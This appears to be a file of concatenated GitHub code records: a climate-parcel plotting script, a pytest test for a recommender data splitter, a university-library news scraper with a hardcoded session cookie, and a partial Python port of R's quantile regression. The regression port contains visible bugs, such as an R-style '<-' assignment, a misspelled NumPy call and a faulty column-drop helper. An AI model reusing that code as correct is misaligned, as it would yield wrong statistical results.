chart(np.reshape(h_old,[biny,binx]),vmin=0,vmax=100,txt=\"percentage of ending by age\")\r\n chart(np.reshape(h_dead,[biny,binx]),vmin=0,vmax=100,txt=\"percentage of escape\")\r\n #chart(np.reshape(h_alive,[biny,binx]),txt=\"percentage of still alive\")\r\n\r\n # %%\r\n # statistics of the convectives sources\r\n H = 0.5*(H_m[0] + H_m[1])\r\n chart(H,txt=\"distribution of convective sources from EIZ FULL \"+str(theta)+\" K Jul-Aug 2017\",fgp='EIZ-FULL-distrib-sources-'+str(theta)+'K')\r\n\r\n\r\n# # %% Moisture\r\n# # load MLS profile data\r\n# prof_file = '../MLS/MeanMLSProf-H2O-2016-07.pkl'\r\n# prof = pickle.load(gzip.open(prof_file,'r'))\r\n# # CORRECTIVE STEPS\r\n# # copy and correction of water vapour (as satratio was in kg/kg)\r\n# rvs=29/18*ended['rvs']\r\n# \"\"\" take care of the remaining parcels (temporary fix before removal from\r\n# convsrc3 processing)\r\n# About 3500 parcels are in this case with no info kept in ended.\r\n# Put them all at a single location.\r\n# This is not going to have a role as it represents 0,01%\"\"\"\r\n# jpnull=np.where(ended['p']==0)[0]\r\n# ended['p'][jpnull] = 10000.\r\n# ended['y'][jpnull] = 25.\r\n# # set rvs for the DEADBORNE parcels\r\n# j_db = np.where(ended['flag'] & I_DBORNE == I_DBORNE)[0]\r\n# y_end = ended['y'][j_db]\r\n# logp_end = np.log(ended['p'][j_db])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n# rvs[j_db] =np.minimum(rvs[j_db],prof['H2O'][idp,idy])\r\n# # 1) Plot of the raw distribution of moisture\r\n# num_blocs = int(len(ended['x'])/bloc_size)\r\n# rvs_r = np.mean(np.reshape(rvs,[num_blocs,bloc_size]),0)\r\n# chart(np.reshape(1.e6*rvs_r,[biny,binx]),txt='raw moisture')\r\n# # 2) contribution of hits to water vapour\r\n# j_hits = np.where(ended['flag'] & I_HIT)[0] % bloc_size\r\n# hh = np.maximum(np.histogram(j_hits,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0],1)\r\n# rvs_hits = rvs[ended['flag'] & I_HIT == I_HIT]\r\n# rvs_c = np.zeros(bloc_size)\r\n# for j in range(len(rvs_hits)):\r\n# rvs_c[j_hits[j]] += rvs_hits[j]\r\n# rvs_c = rvs_c/hh\r\n# chart(np.reshape(1.e6*rvs_c,[biny,binx]),txt=\"hit moisture\")\r\n\r\n# #%%\r\n# # 3) correction of non hits rvs with MLS values on the edge\r\n# prof_file = '../MLS/MeanMLSProf-H2O-2016-07.pkl'\r\n# prof = pickle.load(gzip.open(prof_file,'r'))\r\n# j_nohits = np.where(ended['flag'] & I_HIT ==0)[0]\r\n# y_end = ended['y'][j_nohits]\r\n# logp_end = np.log(ended['p'][j_nohits])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n#\r\n# rvs[j_nohits] =np.minimum(rvs[j_nohits],prof['H2O'][idp,idy])\r\n# rvs_t = np.mean(np.reshape(rvs,[num_blocs,bloc_size]),0)\r\n# chart(np.reshape(1.e6*rvs_t,[biny,binx]),txt='moisture v1')\r\n#\r\n# # 4) now set the rvs on hit at the mls value same alt and lat\r\n# j_hits=np.where(ended['flag'] & I_HIT == I_HIT)[0]\r\n# y_end = ended['y'][j_hits]\r\n# logp_end = np.log(ended['p'][j_hits])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n#\r\n# rvs[j_hits] =np.minimum(rvs[j_hits],prof['H2O'][idp,idy])\r\n# rvs_tt = np.sum(np.reshape(rvs,[num_blocs,bloc_size]),0)/num_blocs\r\n# chart(np.reshape(1.e6*rvs_tt,[biny,binx]),txt='moisture v2')\r\n\r\n# %%\r\ndef chart(field,txt=\"\",vmin=0,vmax=0,fgp=\"\"):\r\n \"\"\" Plots a 2d array field with colormap between min and max\"\"\"\r\n if(len(field.shape)>2):\r\n print(\"The field should be 2d\")\r\n return -1\r\n try:\r\n 
n1=plt.get_fignums()[-1]+1\r\n fig=plt.figure(plt.get_fignums()[-1]+1,figsize=[13,6])\r\n except:\r\n n1=1\r\n fig=plt.figure(n1+1,figsize=[13,6])\r\n m = Basemap(projection='cyl',llcrnrlat=domain[1,0],urcrnrlat=domain[1,1],\r\n llcrnrlon=domain[0,0],urcrnrlon=domain[0,1],resolution='c')\r\n m.drawcoastlines(color='w'); m.drawcountries(color='k')\r\n meridians = np.arange(-180.,180.,30.); parallels = np.arange(-50.,50.,20.)\r\n m.drawmeridians(meridians,labels=[0,0,0,1],fontsize=15)\r\n m.drawparallels(parallels,labels=[1,0,0,0],fontsize=15)\r\n if vmin==0:\r\n vmin=np.min(field)\r\n if vmax==0:\r\n vmax=np.max(field)\r\n bounds=np.arange(vmin,vmax*(1+0.0001),(vmax-vmin)/mymap.N)\r\n norm=colors.BoundaryNorm(bounds,mymap.N)\r\n iax=plt.imshow(field,interpolation='nearest',extent=domain.flatten(),\r\n clim=[vmin,vmax],origin='lower',cmap=mymap,norm=norm,aspect=1.)\r\n plt.title(txt,fontsize=18)\r\n #plt.xlabel('longitude')\r\n #plt.ylabel('latitude')\r\n cax = fig.add_axes([0.91, 0.26, 0.03, 0.5])\r\n cbar=fig.colorbar(iax,cax=cax)\r\n cbar.ax.tick_params(labelsize=18)\r\n #if len(fgp)>0:\r\n #plt.savefig('figs/chart-'+fgp+'.png') \r\n plt.show()\r\n\r\n# %%\r\nif __name__ == '__main__':\r\n main()","repo_name":"bernard-legras/STC","sub_path":"STC-back/analysNFULL.py","file_name":"analysNFULL.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"56"} +{"seq_id":"36031469974","text":"# pylint: disable-all\nfrom datetime import datetime\n\nimport pytest\nimport numpy as np\n\nfrom replay.splitters import ColdUserRandomSplitter\n\n\n@pytest.fixture\ndef log():\n import pandas as pd\n\n return pd.DataFrame(\n {\n \"user_idx\": list(range(5000)),\n \"item_idx\": list(range(5000)),\n \"relevance\": [1] * 5000,\n }\n )\n\n\ndef test(log):\n ratio = 0.25\n cold_user_splitter = ColdUserRandomSplitter(ratio)\n cold_user_splitter.seed = 27\n train, test = cold_user_splitter.split(log)\n test_users = test.toPandas().user_idx.unique()\n train_users = train.toPandas().user_idx.unique()\n assert not np.isin(test_users, train_users).any()\n real_ratio = len(test_users) / len(log)\n assert np.isclose(\n real_ratio, ratio, atol=0.01\n ) # Spark weights are random ¯\\_(ツ)_/¯\n","repo_name":"sb-ai-lab/RePlay","sub_path":"tests/splitters/test_cold_user_randrom_splitter.py","file_name":"test_cold_user_randrom_splitter.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"56"} +{"seq_id":"42568767149","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef resapce(word):\n return word.replace('\\n','').replace('\\r','').replace('\\t','').replace(' ','').replace('\\xa0','').replace(' ','')\ndef get_text(url1):\n headers = {\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9, image / webp, image / apng, * / *;q = 0.8',\n 'Accept - Encoding': 'gzip, deflate',\n 'Accept - Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache - Control': 'max - age = 0',\n 'Connection': 'keep - alive',\n 'Cookie': 'td_cookie=3615363546; JSESSIONID=291525C93525A077BFB1706F222B51D8',\n 'Host': 'lib.haust.edu.cn',\n 'Upgrade - Insecure - Requests': ' 1',\n 'User - Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36',\n }\n req = urllib.request.Request(url1, headers=headers)\n page = urllib.request.urlopen(req)\n html = page.read().decode('utf-8')\n 
soup1=BeautifulSoup(html)\n pattern = soup1.find_all('li','sconimg', 'a')\n for id in pattern:\n rel = r'href=\"(.*?)\"'\n ur = re.findall(rel, str(id), re.S)[0]\n print(ur)\n url2= 'http://lib.haust.edu.cn'+ ur\n print(url2)\n with open('henankejidaxue.txt','a+',encoding='utf-8') as f:\n f.write(url2+'\\n')\n req1 = urllib.request.Request(url2, headers=headers)\n page = urllib.request.urlopen(req1)\n html = page.read().decode('utf-8')\n soup2=BeautifulSoup(html)\n title=soup2.find_all('h1')\n for t1 in title:\n tit=resapce(t1.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write(tit + '\\n')\n time=soup2.find_all('div','list_cont_menu')\n for t2 in time:\n tim = resapce(t2.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write(tim + '\\n')\n content=soup2.find_all('div','list_cont_content')\n for c1 in content:\n con = resapce(c1.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write( con+ '\\n')\n\ndef main(id):\n url = 'http://lib.haust.edu.cn/haust/include/annmessage.jsp?id=104&pager.offset='+str(id)\n html = get_text(url)\nif __name__=='__main__':\n for i in range(0,60,10):\n main(i)","repo_name":"z1165419193/spark","sub_path":"datasearch/universitesnews/henankejidaxue/henankejidaxue.py","file_name":"henankejidaxue.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28482646768","text":"import numpy as np\r\nfrom quantregpy._fortran import rqbr, rqfnb, rqs, rqfnc, qfnb, pfnb\r\nfrom scipy.stats import norm\r\nfrom scipy.stats import t as studentT\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom copy import deepcopy\r\nimport pandas as pd\r\nimport collections\r\nfrom patsy import dmatrices, DesignMatrix\r\nimport logging\r\n\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nFit = collections.namedtuple(\r\n 'Fit', \r\n 'na_action formula terms x_design y_design call tau weights residuals rho method model coefficients fitted_values na_message Class')\r\n\r\ndef bandwidth_rq(p, n, hs = True, alpha = 0.05):\r\n \"\"\"\r\n Bandwidth selection for sparsity estimation two flavors:\r\n Hall and Sheather(1988, JRSS(B)) rate = O(n^{-1/3})\r\n Bofinger (1975, Aus. J. Stat) -- rate = O(n^{-1/5})\r\n Generally speaking, default method, hs=TRUE is preferred.\r\n \"\"\"\r\n x0 = norm.ppf(p)#qnorm(p)\r\n f0 = norm.pdf(x0)#dnorm(x0)\r\n if(hs):\r\n bandwidth = ( n**(-1./3.) * norm.ppf(1. - alpha/2.)**(2./3.) * ((1.5 * f0**2.)/(2. * x0**2. + 1.))**(1./3.) )\r\n else:\r\n bandwidth = n**-0.2 * ((4.5 * f0**4.)/(2. * x0**2. 
+ 1.)**2.)**0.2\r\n return bandwidth\r\n\r\ndef print_rq(x : Fit, *args):\r\n print(\"Call:\")\r\n print(x.call)\r\n coef = x.coefficients\r\n print(\"\\nCoefficients:\\n\")\r\n print(coef, args)\r\n nobs = x.residuals.shape[0]\r\n p = coef.shape[1] if( len(coef.shape) > 1) else coef.shape[0]\r\n rdf = nobs - p\r\n print(f\"\\nDegrees of freedom:{nobs}total;{rdf}residual\\n\")\r\n print(f\"{x.na_message}\\n\")\r\n\r\ndef print_summary_rq(x, digits = 5, *args):\r\n print(\"\\nCall: \")\r\n print(x.call)\r\n coef = x.coef\r\n tau = x.tau\r\n print(\"\\ntau: \")\r\n print([round(t,digits) for t in tau.tolist()], args)\r\n print(\"\\nCoefficients:\\n\")\r\n print([round(c, digits) for c in coef.tolist()], args)\r\n\r\ndef failIfMissingData(df):\r\n if df.isnull().values.any():\r\n print(\"Missing data in data\")\r\n raise ValueError\r\n\r\ndef rq(formula : str, tau : np.array, data : pd.DataFrame, subset = None, weights = None,\r\n na_action = failIfMissingData,\r\n method = \"br\", model = True, contrasts = None, *args):\r\n tau = np.array([tau]) if type(tau) is float else tau\r\n expandedArgs = \", \".join(str(arg) for arg in args)\r\n baseCall = f\"rq(formula = {formula}, tau = {tau}, data = {data}, subset = {subset}, weights = {weights}, na_action = {na_action}, method = {method}, model = {model}, constrasts = {contrasts}\"\r\n call = baseCall + \", \" + expandedArgs\r\n mf = baseCall + f\", args = {args}\"\r\n m = \",\".join([param for param in mf.split(\",\") if param in (\"formula\", \"data\", \"subset\", \"weights\", \"na_action\")])\r\n Y, X = dmatrices(formula, data) # DesignMatrix\r\n mt = X.design_info.term_names # List[str]\r\n eps = np.finfo(float).eps**(2/3) # float\r\n Rho = lambda u, tau: u * (tau - (u < 0)) # Callable\r\n if(tau.shape[0]>1):\r\n if(np.any(tau < 0) or np.any(tau > 1)):\r\n logger.error(\"invalid tau: taus should be >= 0 and <= 1\")\r\n raise ValueError\r\n tau[tau == 0] = eps\r\n tau[tau == 1] = 1 - eps\r\n coef = np.zeros((X.shape[1],tau.shape[0]))\r\n rho = np.zeros(tau.shape[0])\r\n fitted = np.zeros((X.shape[0], tau.shape[0]))\r\n resid = np.zeros((X.shape[0], tau.shape[0]))\r\n for i in range(tau.shape[0]):\r\n z = rq_wfit(X, Y, tau[i], weights, method, *args) if not (weights is None) else rq_fit(X, Y, tau[i], method, *args)\r\n coef[:,i] = z['coefficients']\r\n resid[:,i] = z['residuals']\r\n rho[i] = np.sum(Rho(z['residuals'],tau[i]))\r\n fitted[:,i] = Y - z['residuals']\r\n taulabs = f\"tau={np.around(tau,3)}\"\r\n fit = dict()\r\n fit['coefficients'] = coef\r\n fit['residuals'] = resid\r\n fit['fitted_values'] = fitted\r\n if(method == \"lasso\"): \r\n fit['Class'] = (\"lassorqs\",\"rqs\")\r\n elif(method == \"scad\"):\r\n fit['Class'] = (\"scadrqs\",\"rqs\")\r\n else:\r\n fit['Class'] = \"rqs\"\r\n else:\r\n process = (tau < 0) or (tau > 1)\r\n if(tau == 0):\r\n tau = eps\r\n if(tau == 1):\r\n tau = 1 - eps\r\n fit = rq_wfit(X, Y, tau, weights, method, *args) if not (weights is None) else rq_fit(X, Y, tau, method, *args) \r\n if(process):\r\n rho = [fit['sol'][1,:],fit['sol'][3,:]]\r\n else:\r\n rho = np.sum(Rho(fit['residuals'],tau)) # np.ndarray\r\n if(method == \"lasso\"):\r\n fit['Class'] = (\"lassorq\",\"rq\")\r\n elif(method == \"scad\"):\r\n fit['Class'] = (\"scadrq\",\"rq\")\r\n else:\r\n fit['Class'] = \"rq.process\" if process else \"rq\"\r\n fit['na_action'] = na_action # Callable\r\n fit['formula'] = formula # str\r\n fit['terms'] = mt # List[str]\r\n fit['x_design'] = X.design_info # DesignInfo\r\n fit['y_design'] = Y.design_info # 
DesignInfo\r\n fit['call'] = call # str\r\n fit['tau'] = tau # np.ndarray\r\n fit['weights'] = weights # Union[None, np.ndarray]\r\n fit['rho'] = rho # np.ndarray\r\n fit['method'] = method # str\r\n if(model):\r\n fit['model'] = mf # str\r\n return fit\r\n\r\ndef rq_fit(x : np.array, y : np.array, tau = 0.5, method = \"br\", *args):\r\n if (method == \"fn\"): \r\n fit = rq_fit_fnb(x, y, tau, *args)\r\n elif (method == \"fnb\"):\r\n fit = rq_fit_fnb(x, y, tau, *args)\r\n elif (method == \"fnc\"):\r\n fit = rq_fit_fnc(x, y, tau, *args)\r\n elif (method == \"pfnb\"):\r\n \tfit = rq_fit_pfnb(x, y, tau, *args)\r\n elif (method == \"br\"):\r\n fit = rq_fit_br(x, y, tau, *args)\r\n #elif (method == \"lasso\"):\r\n #\tfit = rq_fit_lasso(x, y, tau, *args)\r\n #elif (method == \"scad\"):\r\n #\tfit = rq_fit_scad(x, y, tau = tau, *args)\r\n else:\r\n raise ValueError(f\"rq.fit.{method} not yet implemented\")\r\n\r\n fit['fitted_values'] = y - fit['residuals']\r\n return fit\r\n\r\ndef dropNpColumn(npmat, j):\r\n if j == 0:\r\n return npmat[:,1:]\r\n elif j == npmat.shape[1] - 1:\r\n return npmat[:,:j]\r\n else:\r\n return np.concatenate((npmat[:,:j],npmat[:,:j+1]), axis=1)\r\n\r\ndef rq_wfit(x, y, tau, weights, method = \"br\", *args):\r\n if(any(weights < 0)):\r\n raise ValueError(\"negative weights not allowed\")\r\n if len(weights.shape) != 2:\r\n weights = weights.reshape((weights.shape[0],1))\r\n wx = x * weights \r\n wy = y * weights.flatten()\r\n\r\n if (method == \"fn\"): \r\n fit = rq_fit_fnb(wx, wy, tau, *args)\r\n elif (method == \"fnb\"):\r\n fit = rq_fit_fnb(wx, wy, tau, *args)\r\n elif (method == \"fnc\"):\r\n fit = rq_fit_fnc(wx, wy, tau, *args)\r\n #elif (method == \"pfn\"):\r\n # fit = rq_fit_pfn(x, y, tau, *args)\r\n if (method == \"br\"):\r\n fit = rq_fit_br(wx, wy, tau, *args)\r\n else:\r\n print(f\"rq.fit.{method} not yet implemented\")\r\n raise ValueError\r\n if(len(fit.get('sol',[])) > 0):\r\n fit['fitted_values'] = np.matmul( x , fit['sol'][3:,:])\r\n else:\r\n yhat = np.matmul( x , fit['coefficients'])\r\n ny = 1 if len(y.shape) == 1 else y.shape[1]\r\n fit['fitted_values'] = yhat.reshape((yhat.shape[0], ny))\r\n fit['residuals'] = y - fit[\"fitted_values\"]\r\n fit['weights'] = weights\r\n return fit\r\n\r\ndef rq_fit_br(x, y, tau = 0.5, alpha = 0.1, ci = False, iid = True,\r\n interp = True, tcrit = True):\r\n \"\"\"\r\n Function to compute regression quantiles using original simplex approach\r\n of Barrodale-Roberts/Koenker-d'Orey. There are several options.\r\n The options are somewhat different than those available for the Frisch-\r\n Newton version of the algorithm, reflecting the different natures of the\r\n problems typically solved. Succintly BR for \"small\" problems, FN for\r\n \"large\" ones. Obviously, these terms are conditioned by available hardware.\r\n\r\n Basically there are two modes of use:\r\n 1. For Single Quantiles:\r\n \r\n if tau is between 0 and 1 then only one quantile solution is computed.\r\n \r\n if ci = FALSE then just the point estimate and residuals are returned\r\n \t\tIf the column dimension of x is 1 then ci is set to FALSE since\r\n \t\tsince the rank inversion method has no proper null model.\r\n if ci = TRUE then there are two options for confidence intervals:\r\n \r\n 1. if iid = TRUE we get the original version of the rank\r\n inversion intervals as in Koenker (1994)\r\n 2. 
if iid = FALSE we get the new version of the rank inversion\r\n intervals which accounts for heterogeneity across\r\n observations in the conditional density of the response.\r\n The theory of this is described in Koenker-Machado(1999)\r\n Both approaches involve solving a parametric linear programming\r\n problem, the difference is only in the factor qn which\r\n determines how far the PP goes. In either case one can\r\n specify two other options:\r\n 1. interp = FALSE returns two intervals an upper and a\r\n lower corresponding to a level slightly\r\n above and slightly below the one specified\r\n by the parameter alpha and dictated by the\r\n essential discreteness in the test statistic.\r\n \t\t\t\tinterp = TRUE returns a single interval based on\r\n linear interpolation of the two intervals\r\n returned: c.values and p.values which give\r\n the critical values and p.values of the\r\n upper and lower intervals. Default: interp = TRUE.\r\n 2. tcrit = TRUE uses Student t critical values while\r\n tcrit = FALSE uses normal theory ones.\r\n 2. For Multiple Quantiles:\r\n \r\n if tau < 0 or tau >1 then it is presumed that the user wants to find\r\n all of the rq solutions in tau, and the program computes the whole\r\n \tquantile regression solution as a process in tau, the resulting arrays\r\n \tcontaining the primal and dual solutions, betahat(tau), ahat(tau)\r\n are called sol and dsol. These arrays aren't printed by the default\r\n print function but they are available as attributes.\r\n It should be emphasized that this form of the solution can be\r\n \tboth memory and cpu quite intensive. On typical machines it is\r\n \tnot recommended for problems with n > 10,000.\r\n \tIn large problems a grid of solutions is probably sufficient.\r\n \"\"\"\r\n tol = np.finfo(float).eps**(2/3)\r\n eps = tol\r\n big = np.finfo(float).max**(2/3)\r\n p = x.shape[1]\r\n n = x.shape[0]\r\n nsol = 2\r\n ndsol = 2\r\n # Check for Singularity of X since br fortran isn't very reliable about this\r\n #storage.mode(y) <- \"double\"\r\n if (np.linalg.matrix_rank(x) < p):\r\n raise ValueError(\"Singular design matrix\")\r\n if (tau < 0) or (tau > 1):\r\n nsol = 3 * n\r\n ndsol = 3 * n\r\n lci1 = False\r\n qn = np.array([0] * p)\r\n cutoff = 0\r\n tau = -1\r\n else:\r\n if (p == 1):\r\n ci = False\r\n if (ci):\r\n lci1 = True\r\n if (tcrit):\r\n cutoff = studentT.ppf(1 - alpha/2, n - p)\r\n else: \r\n cutoff = norm.ppf(1 - alpha/2.)\r\n if (not iid):\r\n h = bandwidth_rq(tau, n, hs = True)\r\n bhi = rq_fit_br(x, y, tau + h, ci = False)\r\n bhi = bhi['coefficients']\r\n blo = rq_fit_br(x, y, tau - h, ci = False)\r\n blo = blo['coefficients']\r\n dyhat = np.matmul(x, (bhi - blo))\r\n if (np.any(dyhat <= 0)):\r\n pfis = (100 * np.sum(dyhat <= 0))/n\r\n print(f\"{pfis}percent fis <=0\")\r\n f = np.maximum(eps, (2 * h)/(dyhat - eps))\r\n qn = np.array([0]*p)\r\n for j in range(p):\r\n tempX = dropNpColumn(x, j)\r\n tempY = x[:,j]\r\n lr = LinearRegression().fit(tempX, tempY, sample_weight=f)\r\n qnj = lr.predict(tempX) - tempY\r\n qn[j] <- np.sum(qnj * qnj)\r\n else:\r\n qn = 1./np.diagonal(np.linalg.inv(np.matmul(x.T,x)))\r\n else:\r\n lci1 = False\r\n qn = np.array([0]*p)\r\n cutoff = 0\r\n sFor,waFor,wbFor,nsolFor,ndsFor= np.zeros([n]), np.zeros([(n + 5), (p + 4)]), np.zeros(n), nsol,ndsol\r\n tnmat = np.zeros([4,p])\r\n flag,coef,resid,sol,dsol,lsol, h, qn, cutoff, ci, tnmat = rqbr(p+3,x,y,tau,tol,sFor,waFor,wbFor,nsolFor,ndsFor,tnmat, big, lci1)\r\n if (flag != 0):\r\n if flag == 1:\r\n print(\"Solution may be 
nonunique\")\r\n else:\r\n print(\"Premature end - possible conditioning problem in x\")\r\n if (tau < 0) or (tau > 1):\r\n sol = sol[1:((p + 3) * lsol)]\r\n dsol = dsol[1:(n * lsol)]\r\n return({\"sol\" : sol, \"dsol\" : dsol})\r\n if (not np.any(ci)):\r\n dual = dsol.T.flatten()[0:n]\r\n yhatCols = 1 if len(coef.shape) < 2 else coef.shape[1]\r\n yhat = np.matmul(x, coef).reshape((x.shape[0], yhatCols))\r\n return(dict(coefficients = coef, x = x, y = y, residuals = y - yhat.flatten(), dual = dual))\r\n if (interp):\r\n Tn = tnmat\r\n Tci = ci\r\n Tci[3, :] = Tci[3, :] + (np.abs(Tci[4, :] - Tci[3, :]) * (cutoff -\r\n np.abs(Tn[3, :])))/np.abs(Tn[4,: ] - Tn[3, :])\r\n Tci[2, :] = Tci[2, :] - (np.abs(Tci[1,: ] - Tci[2, :]) * (cutoff -\r\n np.abs(Tn[2, :])))/np.abs(Tn[1, :] - Tn[2, :])\r\n Tci[2, np.isnan(Tci[2,:]) ] = -big\r\n Tci[3, np.isnan(Tci[3,:]) ] = big\r\n coefficients = np.concatinate((coef,Tci[2:4, : ].T), axis = 1)\r\n residuals = y - np.matmul(x, coef)\r\n return(dict(coefficients = coefficients, residuals = residuals))\r\n else:\r\n Tci = ci\r\n coefficients = np.concatenate([coef, Tci.T], axis=1)\r\n residuals = y - np.matmul(x , coef)\r\n c_values = tnmat.T\r\n c_values = np.fliplr(c_values) \r\n p_values = studentT.cdf(c_values, n - p) if (tcrit) else norm.cdf(c_values)\r\n return dict(coefficients = coefficients, residuals = residuals,\r\n c_values = c_values, p_values = p_values)\r\n\r\ndef rq_fit_fnb (x, y, tau = 0.5, beta = 0.99995, eps = 1e-06):\r\n n = y.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n if(n != x.shape[0]):\r\n raise ValueError(\"x and y don't match n\")\r\n if (tau < eps) or (tau > 1 - eps):\r\n raise ValueError(\"No parametric Frisch-Newton method. Set tau in (0,1)\")\r\n rhs = (1 - tau) * np.sum(x, axis = 0)\r\n d = np.ones(n)\r\n u = np.ones(n)\r\n wn = np.zeros((n,9))\r\n wn[0:n,0] = (1-tau) #initial value of dual solution\r\n a = x.T\r\n wp, nit, info = rqfnb(a,-y,rhs,d,u,beta,eps,wn)\r\n if (info != 0):\r\n raise ValueError(f\"Error info = {info} in stepy: singular design\")\r\n coefficients = -wp[:,0].reshape((p,1))\r\n residuals = y - np.matmul(x,coefficients).flatten()\r\n return dict(coefficients=coefficients.flatten(), tau=tau, residuals=residuals)\r\n\r\ndef rq_fit_fnc(x, y, R, r, tau = 0.5, beta = 0.9995, eps = 1e-06):\r\n n1 = y.shape[0]\r\n n2 = r.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n if (n1 != x.shape[0]):\r\n raise ValueError(\"x and y don't match n1\")\r\n if (n2 != R.shape[0]):\r\n raise ValueError(\"R and r don't match n2\")\r\n if (p != ( 1 if len(R.shape) == 1 else R.shape[1] ) ):\r\n raise ValueError(\"R and x don't match p\")\r\n if (tau < eps) or (tau > 1 - eps):\r\n raise ValueError(\"No parametric Frisch-Newton method. 
Set tau in (0,1)\")\r\n rhs = (1 - tau) * np.sum(x, axis = 0)\r\n u = np.ones(max(n1,n2)) #upper bound vector and scratch vector\r\n wn1 = np.zeros((n1, 9) )\r\n wn1[0:n1] = (1 - tau) #store the values of x1\r\n wn2 = np.zeros(( n2, 6))\r\n wn2[0:n2] = 1 #store the values of x2\r\n _, _, wp, nit, info = rqfnc( x.T, -y, R.T, -r, rhs, u, beta, eps, wn1, wn2)\r\n if (info != 0):\r\n raise ValueError(f\"Error info = {info} in stepy: singular design\")\r\n coefficients = -wp[0:p,0]\r\n residuals = y - np.matmul(x,coefficients).flatten()\r\n it_count = nit\r\n return dict(coefficients=coefficients, tau=tau, residuals=residuals)\r\n\r\ndef rqs_fit(x, y, tau = 0.5, tol = 0.0001):\r\n \"\"\" \r\n function to compute rq fits for multiple y's\r\n \"\"\"\r\n p = x.shape[1]\r\n n = x.shape[0]\r\n m = y.shape[1]\r\n\r\n flag, coef, e = rqs(\r\n x,\r\n y,\r\n tau,\r\n tol,\r\n np.zeros([n]),\r\n np.zeros([(n + 5) , (p + 2)]),\r\n np.zeros(n))\r\n if(np.sum(flag)>0):\r\n if(np.any(flag==2)):\r\n print(f\"{np.sum(flag==2)} out of {m} BS replications have near singular design\")\r\n if(np.any(flag==1)):\r\n print(f\"{np.sum(flag==1)} out of {m} may be nonunique\")\r\n \r\n return(coef.T)\r\n\r\n# R function for fnb call for multiple taus\r\ndef rq_fit_qfnb(x,y,tau):\r\n n = x.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n m = len(tau)\r\n d = np.ones((1, n))\r\n u = np.ones((1, n))\r\n _, _, _, b, nit, info = qfnb(x.transpose(), -y, tau, d, u)\r\n if(info != 0):\r\n logger.warning(f\"Info = {info} in stepy: singular design: nit = {nit[0]}\")\r\n coefficients = -np.reshape(b, (p, m))\r\n return dict(coefficients = coefficients, nit = nit, flag = info)\r\n\r\ndef rq_fit_pfnb (x, y, tau = np.array([0.5]), m0 = None, eps = 1e-06):\r\n tau = np.array([tau]) if type(tau) is float else tau\r\n m = len(tau)\r\n n = len(y)\r\n if (x.shape[0] != n):\r\n ValueError(\"x and y don't match n\")\r\n p = x.shape[1]\r\n if(m0 is None):\r\n m0 = int( (n**(2./3.)) * ((p ** 0.5)) ) # Needs testing!\r\n s = np.random.choice(n,m0)\r\n xs = x[s,:]\r\n ys = y[s]\r\n z = rq_fit(xs, ys, tau = tau[0], method = \"fn\")\r\n r = y - np.matmul( x , z['coefficients'] ).flatten()\r\n b = np.zeros((p,m))\r\n nit = np.zeros((5,m))\r\n xxinv = np.linalg.inv((np.linalg.cholesky((np.matmul(xs.T,xs)))))\r\n band = np.maximum(eps, np.sqrt(np.matmul(np.matmul(x , xxinv)**2 , np.ones(p) ) ) )\r\n r, b, d, u, wn, wp, aa, yy, slo, shi, rhs, glob, ghib, nit, info = pfnb (\r\n x.T,\r\n y,\r\n tau,\r\n r,\r\n -b,\r\n band,\r\n m0)\r\n coefficients = np.reshape(-b,(p,m))\r\n nit = np.reshape(nit,(5,m))\r\n return dict(coefficients = coefficients, nit = nit, flag = info)\r\n","repo_name":"quantregpy/quantregpy","sub_path":"quantregpy/quantreg.py","file_name":"quantreg.py","file_ext":"py","file_size_in_byte":17734,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"56"} +{"seq_id":"70924098736","text":"from airflow import AirflowException\nfrom datetime import datetime, timedelta\nfrom exchangerate.api_utils import request_date_range\nfrom exchangerate.orm_utils import put_rates_to_stage, get_max_dates\n\n\ndef check_state(db_conf, pairs):\n pairs_to_load_recent = {}\n pairs_to_load_history = pairs.copy()\n\n for row in get_max_dates(db_conf):\n if row.pair in pairs:\n pairs_to_load_recent[row.pair] = row.max_date\n pairs_to_load_history.remove(row.pair)\n\n return pairs_to_load_recent, pairs_to_load_history\n\n\ndef split_date_range(start, end, max_days=365):\n days = (end - start).days\n while days > 
